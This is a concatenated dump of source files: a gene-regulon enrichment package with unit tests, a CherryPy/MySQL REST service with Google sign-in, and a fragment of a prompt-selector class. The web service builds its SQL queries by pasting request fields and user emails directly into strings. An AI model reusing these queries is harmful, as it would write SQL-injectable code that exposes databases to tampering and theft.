default=0.1)
# parse command line arguments
args = parser.parse_args()
expr_matrix = pd.read_table(args.expr,index_col=0)
enr_obj = Enrichment(cohort=args.cohort, expr=expr_matrix, regulon=args.regulon,
regulon_size=args.regulon_size, sec_intx=args.sec_intx,
thresh_filter=args.thresh_filter)
print(enr_obj)
print('\nScaling data...\n')
enr_obj.scale(scaler_type=args.scaler_type, thresh_filter=args.thresh_filter)
print('\nData scaled!\n')
print('\nAssigning weights...\n')
enr_obj.assign_weights()
print('\nWeights assigned!\n')
print('\nCalculating enrichment...\n')
enr_obj.calculate_enrichment()
print('\nEnrichment scores calculated!\n')
regulon_utils.ensure_dir(args.out_dir)
regulon_utils.write_pickle(enr_obj, os.path.join(args.out_dir,'{}_enrichment.pkl'.format(args.cohort)))
enr_obj.total_enrichment.to_csv(os.path.join(args.out_dir,'{}_regulon_enrichment.tsv'.format(args.cohort)),sep='\t')
print('Complete')
if __name__ == "__main__":
main()
```
#### File: enricher/regulon/regulon_utils.py
```python
import warnings
warnings.simplefilter("ignore", UserWarning)
import pandas as pd
import dill as pickle
import functools
import os
from sklearn.feature_selection import f_regression, mutual_info_regression
from sklearn.mixture import BayesianGaussianMixture as GMM
from scipy.stats import spearmanr, pearsonr
import scipy.stats as st
import numpy as np
from tqdm import tqdm
import timeit
def load_sif():
return pd.read_csv(sif_file, names = ['UpGene', 'Type', 'DownGene'], sep = '\t', header = None)
def filter_sif(sif, intx_type = 'controls-expression-of'):
return sif[(sif['Type'] == intx_type)]
def load_secondary_itx_sif():
""" Load precompiled secondary interaction sif
Returns:
(pandas.DataFrame): pandas.DataFrame obj of length: n interactions and
columns: ['UpGene','Type',DownGene']
"""
return pd.read_csv(sec_intx_file, names = ['UpGene', 'Type', 'DownGene'], sep = '\t', header = None)
def write_pickle(obj, relnm):
""" Serialize object to pickle and write to disk at relnm
Args:
obj (`:obj:`) : Python object to be pickled
relnm (str) : Relative name/path to pickle on disk
Returns:
'Serialized object to disk at {}'.format(relnm)
"""
with open(relnm, 'wb') as f:
pickle.dump(obj, f, protocol = -1)
return 'Serialized object to disk at {}'.format(relnm)
def read_pickle(relnm):
""" Read serialized object from pickle on disk at relnm
Args:
relnm (str) : Relative name/path to pickled object
Returns:
obj (`:obj: unpickled object`)
"""
with open(relnm, 'rb') as f:
obj = pickle.load(f)
print('Loaded object from disk at {}'.format(relnm))
return obj
def ensure_dir(relnm):
""" Accept relative filepath string, create it if it doesnt already exist
return filepath string
Args:
relnm (str) : Relative name/path
Returns:
relnm (str)
"""
d = os.path.join(os.getcwd(), relnm)
if not os.path.exists(d):
print('--- path does not exist : {} ---'.format(d))
print('--- constructing path : {} ---'.format(d))
os.makedirs(d)
return relnm
def traverse_interactions(regulator, filt_sif):
""" Parse interaction network and add secondary interactions on a per regulator basis
Args:
regulator (str): Regulator to expand interaction network
filt_sif (pandas.DataFrame): pandas.DataFrame obj of length: n interactions and
columns: ['UpGene','Type',DownGene']
Returns:
comb_idx (pandas.DataFrame):pandas.DataFrame obj of length: n interactions + secondary interactions and
columns: ['UpGene','Type',DownGene']
"""
sub_reg = filt_sif[(filt_sif.UpGene == regulator)]
down_genes = sub_reg.DownGene.unique()
secondary_itx = filt_sif[(filt_sif.UpGene.isin(down_genes))]
secondary_itx.UpGene = regulator
comb_idx = pd.concat([sub_reg, secondary_itx])
comb_idx.Type = 'controls-expression-of'
comb_idx = comb_idx.drop_duplicates()
comb_idx = comb_idx[(comb_idx.DownGene != regulator)]
return comb_idx
def generate_expanded_regulon():
""" Generates an expanded Pathway Commons regulon with secondary down-stream interactions for
regulators that control the expression of other regulators
Returns:
Nothing - Generates a pickled pandas dataframe for future reference/use
"""
print('--- Generating regulon with primary and secondary interactions ---')
sif = load_sif()
filt_sif = filter_sif(sif)
regulators = filt_sif.UpGene.unique()
regulon_list = list(map(functools.partial(traverse_interactions, filt_sif = filt_sif), regulators))
regulon = pd.concat(regulon_list)
regulon.set_index('UpGene', inplace = True)
regulon.reset_index(inplace=True)
print('---- Regulon constructed ---')
write_pickle(regulon, '../data/secondary_intx_regulon.pkl')
def bgm_moa(regul_weights):
""" Fits regulon mode of activation weights to a bayesian gaussian mixture model with three components and computes
the probability of the three distributions (repression, non-influential, activation) for each regulator
Args:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
Returns:
"""
g = GMM(n_components = 3, max_iter = 1000)
sub_reg = regul_weights.copy()
sub_reg_vals = sub_reg.MoA.values.reshape(-1, 1)
g.fit(sub_reg_vals)
mu = g.means_.flatten()
sigma = np.sqrt(g.covariances_).flatten()
fit = sorted(list(zip(mu, sigma)))
activation = (st.norm.cdf(sub_reg_vals, fit[2][0], fit[2][1]))
repression = 1 - st.norm.cdf(sub_reg_vals, fit[0][0], fit[0][1])
total_lower = 1 - st.norm.cdf(sub_reg_vals, fit[1][0], fit[1][1])
total_upper = (st.norm.cdf(sub_reg_vals, fit[1][0], fit[1][1]))
copy_target = sub_reg.copy()
copy_target['up'] = 0
copy_target['down'] = 0
copy_target.loc[(copy_target.MoA >= 0), 'up'] = 1
copy_target.loc[(copy_target.MoA <= 0), 'down'] = 1
up_moa = copy_target.up.values.reshape(copy_target.shape[0], 1)
down_moa = copy_target.down.values.reshape(copy_target.shape[0], 1)
Mode = (activation / (repression + total_lower + activation) * up_moa) -\
(repression / (repression + total_upper + activation) * down_moa)
return Mode
def prune_regulon(expr, regulon, regulon_size):
""" Prunes regulon with secondary interactions that do not meet the necessary number of downstream interactions
metric {regulon_size}
Args:
expr (pandas DataFrame obj): pandas DataFrame of [n_samples, n_features]
regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
regulon_size (int) : number of downstream interactions required for a given regulator in order to calculate
enrichment score
Returns:
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator
and downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
expr_filtered_regulon = regulon[((regulon.UpGene.isin(expr.columns)) & (regulon.DownGene.isin(expr.columns)))]
expr_filtered_regulon.set_index('UpGene', inplace=True)
idx = (expr_filtered_regulon.index.value_counts() >= regulon_size)
filt_idx = idx[idx==True]
filtered_regulon = expr_filtered_regulon.loc[filt_idx.index]
filtered_regulon.reset_index(inplace=True)
return filtered_regulon
def regulon_weight_assignment(regulator, expr, filtered_regulon):
""" Assigns probability and weights for regulator - target interactions
Args:
regulator (str): Regulator to expand interaction network
expr (:obj: `pandas DataFrame`) : pandas DataFrame containing scaled expression data of
shape [n_samples, n_features]
filtered_regulon (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator
and downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
Returns:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
sub_reg = filtered_regulon[(filtered_regulon['UpGene'] == regulator)]
X = expr.reindex(sub_reg.DownGene.values, axis = 1).dropna(axis = 1)
y = expr.reindex([regulator], axis = 1)
spr_results = X.apply(lambda col: spearmanr(col, y.iloc[:, 0]), axis = 0).apply(pd.Series)
spr_result = spr_results[0]
spr_pvalues = spr_results[1]
f_test, _ = f_regression(X, y.values.ravel())
weights = f_test
weights_spr = weights + abs(spr_result)
regul_weights = (weights_spr * np.sign(spr_result)).to_frame()
regul_weights.columns = ['MoA']
regul_weights.index.name = 'Target'
regul_weights.reset_index(inplace = True)
regul_weights['Regulator'] = regulator
regul_weights['likelihood'] = spr_pvalues.values
regul_weights = regul_weights.reindex(['Regulator', 'Target', 'MoA', 'likelihood'], axis = 1)
regul_weights.set_index('Regulator', inplace = True)
regul_weights = regul_weights[~np.isinf(regul_weights.MoA)]
return regul_weights
def structure_weights(regulator, pruned_regulon, f_statistics, r_frame, p_frame):
""" Calculates weights associated with regulators. Weights are the summation of the F-statistic and absolute
spearman correlation coefficient. The weight retains the sign of the spearman correlation coefficient.
Args:
regulator (str): A feature to assign weights to downstream interactions
pruned_regulon (:obj:`pd.DataFrame`, shape = [n_interactions, 3]
f_statistics (dict) : Dictionary with key:{regulator} key and
r_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
p_frame (:obj:`pd.DataFrame`), shape = [n_features, n_features]
Returns:
weights_ordered (:obj:`pd.DataFrame`), shape = [n_interactions, 3]
"""
sub_regul = pruned_regulon[(pruned_regulon['UpGene'] == regulator)]
targs = sub_regul.DownGene
p_ = p_frame.loc[targs, regulator]
p_.name = 'likelihood'
f_ = f_statistics[regulator][0]
r_ = r_frame.loc[targs, regulator]
w_ = (f_ + abs(r_)) * np.sign(r_)
w_.index.name = 'Target'
w_.name = 'MoA'
weights = w_.to_frame()
weights['likelihood'] = p_
weights['Regulator'] = regulator
weights_ordered = weights.reset_index().reindex(['Regulator', 'Target', 'MoA', 'likelihood'],
axis = 1).set_index('Regulator')
return weights_ordered
def generate_bolstered_regulon(expr, cohort, regulon_size=15):
""" Calculate weights for PC regulon and a dataset using mutual information, f-statistic to test for linear
relationships, and the spearman correlation coefficient to determine the mode of regulation
Args:
expr (:obj: `pandas DataFrame`) : pandas DataFrame containing scaled expression data of
shape [n_samples, n_features]
cohort (str) : name of cohort to associate with compiled regulon
regulon_size (int) : required number of downstream interactions for a give regulator
Returns:
regul_weights (:obj: `pandas DataFrame`) : pandas DataFrame containing weight interactions between regulator and
downstream members of its regulon of shape [len(Target), ['Regulator','Target','MoA','likelihood']
"""
bolstered_relnm = os.path.join(dirname, '../experiments/{0}/data/{0}_bolstered_regulon.pkl'.format(cohort))
# Check to see if bolstered regulon exists
if os.path.isfile(bolstered_relnm):
print('--- loading context specific regulon ---')
total_regulon = read_pickle(bolstered_relnm)
else:
if os.path.isfile(sec_intx_file):
print('--- loading unfiltered regulon ---')
regulon = read_pickle(sec_intx_file)
else:
generate_expanded_regulon()
regulon = read_pickle(sec_intx_file)
print('--- pruning regulon ---')
filtered_regulon = prune_regulon(expr, regulon, regulon_size)
regulators = filtered_regulon.UpGene.unique()
print('--- compiling regulon of {} regulators and {} interactions with a minimum of {} interactions ---'.
format(len(regulators), filtered_regulon.shape[0], regulon_size))
regulon_list = list(map(functools.partial(regulon_weight_assignment, expr=expr,
filtered_regulon = filtered_regulon), tqdm(regulators)))
total_regulon = pd.concat(regulon_list)
relnm = os.path.join(dirname, '../experiments/{0}/data'.format(cohort))
ensure_dir(relnm)
write_pickle(total_regulon, os.path.join(relnm, '{}_bolstered_regulon.pkl'.format(cohort)))
return total_regulon
```
#### File: enricher/tests/test_enrichment.py
```python
import os
import sys
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "resources")
sys.path.extend([os.path.join(base_dir, '../..')])
from sklearn.utils.validation import check_array
from enricher import enrich
import enricher.regulon.regulon_enrichment as regulon_enrichment
import enricher.features.expression_utils as expression_utils
import enricher.regulon.regulon_utils as regulon_utils
from enricher.features.expression_utils import log_norm
from tqdm import tqdm
import warnings
import unittest
import pandas as pd
import numpy as np
import scipy.stats as st
import functools
def load_test_sif(sif='test.sif'):
return pd.read_table(os.path.join(data_dir, sif), index_col=0)
def load_test_expr(expr='test_expr.tsv'):
return pd.read_csv(os.path.join(data_dir, expr), index_col=0, sep = '\t')
class EnrichTestCase(unittest.TestCase):
def test_load_test_sif(self):
sif = load_test_sif()
self.assertSequenceEqual(sif.shape, (1302, 3))
def test_load_test_expr(self):
expr = load_test_expr()
self.assertSequenceEqual(expr.shape, (8723, 6))
def test_enrichment(self):
sif = load_test_sif()
expr = load_test_expr()
filt_sif = regulon_utils.filter_sif(sif)
enr = enrich.Enrichment(expr=expr, cohort = 'TEST', regulon=filt_sif)
self.assertSequenceEqual(enr.expr.shape, expr.shape)
self.assertSequenceEqual(enr.regulon.shape, filt_sif.shape)
self.assertEqual(enr.scaled, False)
self.assertEqual(enr.regulators, None)
self.assertEqual(enr.regulon_size, 15)
self.assertEqual(enr.regulon_weights, None)
self.assertEqual(enr.thresh_filter, 0.1)
self.assertEqual(enr.total_enrichment, None)
self.assertEqual(enr.quant_nes, None)
enr.scale()
self.assertEqual(enr.scaled, True)
enr.assign_weights()
self.assertSequenceEqual(enr.regulon_weights.shape, (433, 3))
self.assertAlmostEqual(enr.regulon_weights.MoA.mean(), 1.1555032640512617)
enr.calculate_enrichment()
self.assertSequenceEqual(enr.regulators.tolist(), ['TP53'])
self.assertSequenceEqual(enr.total_enrichment.shape, (6, 1))
if __name__ == '__main__':
unittest.main()
```
#### File: enricher/tests/test_regulon.py
```python
import os
import sys
base_dir = os.path.dirname(__file__)
data_dir = os.path.join(base_dir, "resources")
sys.path.extend([os.path.join(base_dir, '../..')])
import unittest
import warnings
import pandas as pd
from enricher.enrich import regulon_utils, regulon_enrichment
warnings.simplefilter("ignore", UserWarning)
def load_test_sif(sif='test.sif'):
return pd.read_table(os.path.join(data_dir, sif), index_col=0)
def load_test_expr(expr='test_expr.tsv'):
return pd.read_csv(os.path.join(data_dir, expr), index_col=0, sep = '\t')
class RegulonUtilsTestCase(unittest.TestCase):
def test_load_test_sif(self):
sif = load_test_sif()
self.assertSequenceEqual(sif.shape, (1302, 3))
def test_filter_sif(self):
sif = load_test_sif()
self.assertEqual(regulon_utils.filter_sif(sif).shape[0], 800)
self.assertEqual(regulon_utils.filter_sif(sif)['Type'].unique().tolist()[0], 'controls-expression-of')
def test_load_test_expr(self):
expr = load_test_expr().T
self.assertSequenceEqual(expr.shape, (6, 8723))
def test_prune_regulon(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
self.assertSequenceEqual(filtered_regulon.shape, (433, 3))
def test_regulon_weight_assignment(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
self.assertSequenceEqual(regul_weights.shape, (433, 3))
self.assertSequenceEqual(regul_weights.columns.tolist(), ['Target', 'MoA', 'likelihood'])
self.assertEqual(regul_weights.iloc[0, :].tolist()[0], 'AARS')
self.assertAlmostEqual(regul_weights.iloc[0, :].tolist()[1], 0.1724812122096268)
self.assertAlmostEqual(regul_weights.iloc[0, :].tolist()[2], 0.8717434402332361)
def test_quantile_nes_score(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
nes = regulon_enrichment.quantile_nes_score(regul_weights, expr.T)
self.assertSequenceEqual(nes.columns.tolist(),
['Test_A1', 'Test_A2', 'Test_A3', 'Test_D1', 'Test_D2', 'Test_D3'])
self.assertAlmostEqual(nes.values.mean(), -1.5392231513623145)
def test_score_enrichment(self):
sif = load_test_sif()
expr = load_test_expr().T
filt_sif = regulon_utils.filter_sif(sif)
filtered_regulon = regulon_utils.prune_regulon(expr, filt_sif, 15)
regul_weights = regulon_utils.regulon_weight_assignment('TP53', expr, filtered_regulon)
nes = regulon_enrichment.quantile_nes_score(regul_weights, expr.T)
enrichment = regulon_enrichment.score_enrichment('TP53', expr, regul_weights, nes)
self.assertAlmostEqual(enrichment.values.mean(), -1.6208941454109855)
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JEStaubach/playrestapi",
"score": 2
}
|
#### File: JEStaubach/playrestapi/webapp.py
```python
import cherrypy
import json
from collections import OrderedDict
import mysql.connector
import db_conf
import sys
import atexit
import os
import os.path
from oauth2client import client, crypt
import urllib2
from urlparse import urlparse
#sys.stdout = sys.stderr
#cherrypy.config.update({'environment': 'embedded'})
client_id = '105600165694-08orfb5k9o0tit237hnohila4m694ufu.apps.googleusercontent.com'
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
def get_list(args):
list_name = args[0]
return_vals = []
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM " + list_name)
cursor.execute(query)
for row in cursor:
return_vals.append(dict(row))
cursor.close()
cnx.close()
return return_vals
def remove_row(args):
list_name = args[0]
id = args[1]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "DELETE FROM " + list_name + "_tbl WHERE " + list_name + "_tbl." + list_name[:-1] + "_id = " + id
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'DELETE', 'status': 'success'}
def create_row(args):
new_data = args[0]
list_name = args[1]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "INSERT INTO " + list_name + "_tbl (" + ",".join(new_data.keys())+") VALUES (" + ",".join([ "'" + new_data[key] + "'" for key in new_data]) + ")"
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'POST', 'status': 'success'}
def update_row(args):
new_data = args[0]
list_name = args[1]
id = args[2]
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
cmd = "UPDATE " + list_name + "_tbl SET " + ','.join([key + " = '" + new_data[key] + "'" for key in new_data.keys()]) + " WHERE " + list_name + "_tbl." + list_name[:-1] + "_id = " + id
print(cmd)
query = cmd
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
return {'method': 'UPDATE', 'status': 'success'}
def verify(token):
print('signin')
try:
idinfo = client.verify_id_token(token, None)
if idinfo['aud'] not in [client_id]:
raise crypt.AppIdentityError("Unrecognized client.")
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError("Wrong issuer.")
except crypt.AppIdentityError:
return {'status': 'token validation failed'}
email = idinfo['email']
print(email)
return_vals = []
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM users WHERE user_email = '" + email + "'")
cursor.execute(query)
for row in cursor:
return_vals.append(dict(row))
cursor.close()
cnx.close()
if len(return_vals) > 0:
login_succeeded(email)
return {'status': 'success', 'permissions': return_vals[0]['user_permissions']}
else:
login_failed(email)
return {'status': 'user not registered'}
def login_failed(email):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT * FROM failedlogins WHERE failedlogin_email = '" + email + "'")
cursor.execute(query)
rows = []
for row in cursor:
rows.append(dict(row))
cursor.close()
cnx.close()
fail_count = 1
fail_id = None
if len(rows) > 0:
fail_count = rows[0]['failedlogin_count'] + 1
fail_id = rows[0]['failedlogin_id']
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
if fail_count == 1:
query = "INSERT INTO failedlogins_tbl ( failedlogin_email, failedlogin_count, failedlogin_lastdate, failedlogin_lasttime ) VALUES ( '" + email + "'," + str(fail_count) + ", CURDATE(), CURTIME() )"
else:
query = "UPDATE failedlogins_tbl SET failedlogin_count=" + str(fail_count) + ", failedlogin_lastdate=CURDATE(), failedlogin_lasttime=CURTIME() WHERE failedlogin_id = " + str(fail_id)
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
def login_succeeded(email):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB']['db_name'])
cursor = cnx.cursor(dictionary=True)
query = "INSERT INTO logins_tbl ( login_email, login_date, login_time ) VALUES ( '" + email + "', CURDATE(), CURTIME() )"
cursor.execute(query)
cursor.close()
cnx.commit()
cnx.close()
class HoppersWebService(object):
exposed = True
exposed_views = {}
def __init__(self):
print('init called')
self.get_exposed_views()
print(str(self.exposed_views))
def get_exposed_views(self):
cnx = mysql.connector.connect(user=db_conf.settings['DB']['db_user'],
password=db_conf.settings['DB']['db_pass'],
host=db_conf.settings['DB']['db_host'],
database=db_conf.settings['DB']['db_user'] + '$' + db_conf.settings['DB'][
'db_name'])
cursor = cnx.cursor(dictionary=True)
query = ("SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME IN (SELECT exposedview_name FROM exposedviews)")
cursor.execute(query)
self.exposed_views = {}
for row in cursor:
row_dict = dict(row)
if row_dict['TABLE_NAME'] not in self.exposed_views.keys():
self.exposed_views[str(row_dict['TABLE_NAME'])] = []
self.exposed_views[str(row_dict['TABLE_NAME'])].append({'column_name': row_dict['COLUMN_NAME'],
'column_type': row_dict['DATA_TYPE']})
cursor.close()
cnx.close()
def unhandled(self, method, url, args):
cherrypy.response.status = 404
return json.dumps({'method': method,
'resource': url,
'status': 'Unhandled resource location ' + str(args)})
def bad_fields(self, method, url, args, field_errors):
cherrypy.response.status = 400
return json.dumps({'method': method,
'resource': url,
'status': 'Unknown resource attributes: ' + str(field_errors)})
def collection_exposed(self, collection):
if collection in self.exposed_views.keys():
return True
else:
return False
def field_mismatches(self, collection, new_data):
allowed_fields = [x['column_name'] for x in self.exposed_views[collection]]
print('collection: ' + collection)
print('allowed_fields: ' + str(allowed_fields))
additional_supplied_fields = [x for x in new_data.keys() if x not in allowed_fields]
unsupplied_fields = [x for x in allowed_fields if x not in new_data.keys() and x != collection[:-1] + '_id']
tables_with_unsupplied_ids = [x[:-3] for x in unsupplied_fields if x[-3:] == '_id']
missing_fields = []
for table in tables_with_unsupplied_ids:
for field in new_data.keys():
if table in field:
missing_fields.append(table + '_id')
return {'additional_supplied_fields': additional_supplied_fields,
'unsupplied_fields': unsupplied_fields,
'missing_fields': missing_fields}
def check_token(self, token, method, url, cb, args):
if not token:
# token required in order to be verified
cherrypy.response.status = 401
return json.dumps({'method': method,
'resource': url,
'status': 'missing token'})
else:
crud = {'POST': 'C',
'GET': 'R',
'PUT': 'U',
'DELETE': 'D',}
authorization = verify(token)
if authorization['status'] == 'success':
# token is authentic and user is registered.
if crud[method] in authorization['permissions']:
# user has required permissions
return json.dumps(cb(args))
else:
# User lacks READ permissions
cherrypy.response.status = 403
return json.dumps({'method': method,
'resource': url,
'status': 'Insufficient privileges'})
elif authorization['status'] == 'token validation failed':
# bad token.
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
elif authorization['status'] == 'user not registered':
# token OK, but user not registered.
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
else:
# token verification - unhandled response
cherrypy.response.status = 401
cherrypy.response.headers['Location'] = url
return json.dumps({'method': method,
'resource': url,
'status': authorization['status']})
def GET(self, *args, **kwargs):
print('GET:'+str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
if not args:
args = [None, None]
if args[0] == 'hoppers' and args[1] == 'manage':
return self.manage()
elif args[0] == 'hoppers' and args[1] == 'rest':
if not token:
# Attempt to access a resource or collection without including token.
# Redirect to login page, pass along the requested URL in Location header.
cherrypy.response.headers['Location'] = url
raise cherrypy.HTTPRedirect("/hoppers/manage/#/" + args[2])
else:
if not self.collection_exposed(args[2]):
return self.unhandled('GET', url, args[2:])
return self.check_token(token, 'GET', url, get_list, args[2:])
elif args[0] == 'hoppers' and args[1] == 'tokensignin':
def on_success(args=None):
return json.dumps({'method': 'GET',
'resource': url,
'status': 'success',})
return self.check_token(token, 'GET', url, on_success, None)
else:
return self.unhandled('GET', url, args)
def POST(self, *args):
print('POST '+str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
new_data = json.loads(rawData)
print('post data: '+str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('POST', url, args[2:])
field_errors = self.field_mismatches(args[2], new_data)
if field_errors['additional_supplied_fields'] or field_errors['unsupplied_fields']:
return self.bad_fields('POST', url, args[2:], field_errors)
return self.check_token(token, 'POST', url, create_row, [new_data] + list(args[2:]))
else:
return self.unhandled('POST', url, args)
def PUT(self, *args):
print('PUT ' + str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
new_data = json.loads(rawData)
print('put data: ' + str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('PUT', url, args[2:])
field_errors = self.field_mismatches(args[2], new_data)
if field_errors['additional_supplied_fields'] or field_errors['missing_fields']:
return self.bad_fields('PUT', url, args[2:], field_errors)
return self.check_token(token, 'PUT', url, update_row, [new_data] + list(args[2:]))
else:
return self.unhandled('PUT', url, args)
def DELETE(self, *args):
print('DELETE ' + str(args)+cherrypy.request.scheme)
token = cherrypy.request.headers.get('Authorization')
url = urlparse(cherrypy.url()).path
#rawData = cherrypy.request.body.read(int(cherrypy.request.headers['Content-Length']))
#new_data = json.loads(rawData)
#print('delete data: ' + str(new_data))
if args[0] == 'hoppers' and args[1] == 'rest':
if not self.collection_exposed(args[2]):
return self.unhandled('DELETE', url, args[2:])
return self.check_token(token, 'DELETE', url, remove_row, args[2:])
else:
return self.unhandled('DELETE', url, args)
def serve_index(self):
print('index'+cherrypy.request.scheme)
print(db_conf.settings['static']['path'])
index_file = os.path.abspath(db_conf.settings['static']['path'] + 'index.html')
f = open( index_file, 'r' )
return f.read()
def manage(self):
index_file = os.path.abspath(db_conf.settings['static']['path'] + 'manage.html')
f = open( index_file, 'r' )
return f.read()
if __name__ == '__main__':
print("name {}".format(db_conf.settings['DB']['db_name']))
print("user {}".format(db_conf.settings['DB']['db_user']))
path = None
cherrypy.tree.mount(
HoppersWebService(),
'/',
{
'/hoppers/rest': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/hoppers/tokensignin': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/hoppers/manage': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher()
},
'/': {
'tools.staticdir.on': True,
'tools.staticdir.dir': os.path.abspath(db_conf.settings['static']['path']),
'tools.staticdir.index': 'index.html',
}
}, )
cherrypy.server.ssl_module = 'builtin'
cherrypy.server.ssl_certificate = "cert.pem"
cherrypy.server.ssl_private_key = "privkey.pem"
cherrypy.engine.start()
cherrypy.engine.block()
```
|
{
"source": "JEStaubach/quickprompts",
"score": 2
}
|
#### File: quickprompts/quickprompts/selector_view_model.py
```python
from .common.util import Util
class SelectorViewModel(list):
# Properties
# Magic Methods
def __init__(self, options):
super(SelectorViewModel, self).__init__()
self._model = SelectorViewModel.generate_model(options)
self.bread_crumbs = []
self._chldren_indicator = '>>'
for item in self._format_options_list():
self.append(item)
# Public Methods
@staticmethod
def generate_model(options, delimiter='::'):
d = {}
lines = [line.strip() for line in options.split('\n') if line.strip()]
for line in lines:
sections = [x.strip() for x in line.split(delimiter) if x.strip()]
d = SelectorViewModel._chomp(sections, d)
return d
def step_into_item(self, selected):
if selected not in self:
raise ValueError(str(selected) +
' not found in SelectorViewModel')
if Util.str_ends_in_substr(selected, self._chldren_indicator):
selected_index = self.index(selected)
options = self._get_options_list()
options_text = sorted(options.keys())
option_selected = options_text[selected_index]
self.bread_crumbs.append(option_selected)
del self[:]
for item in self._format_options_list():
self.append(item)
def step_out_of_item(self):
item_stepped_out_of = ''
if self.bread_crumbs:
item_stepped_out_of = self.bread_crumbs[-1]
self.bread_crumbs.pop()
del self[:]
for item in self._format_options_list():
self.append(item)
return item_stepped_out_of
# Private Methods
@staticmethod
def _chomp(sections, d):
if sections:
if sections[0] not in d:
if sections[1:]:
d[sections[0]] = {}
else:
d[sections[0]] = {'': {}}
d[sections[0]] = SelectorViewModel._chomp(sections[1:],
d[sections[0]])
return d
def _format_options_list(self):
options = self._get_options_list()
options_text = sorted(options.keys())
formatted_options = []
for option_text in options_text:
if self._get_children(options[option_text]):
option_index = options_text.index(option_text)
padding = self._get_padding(options_text, option_index)
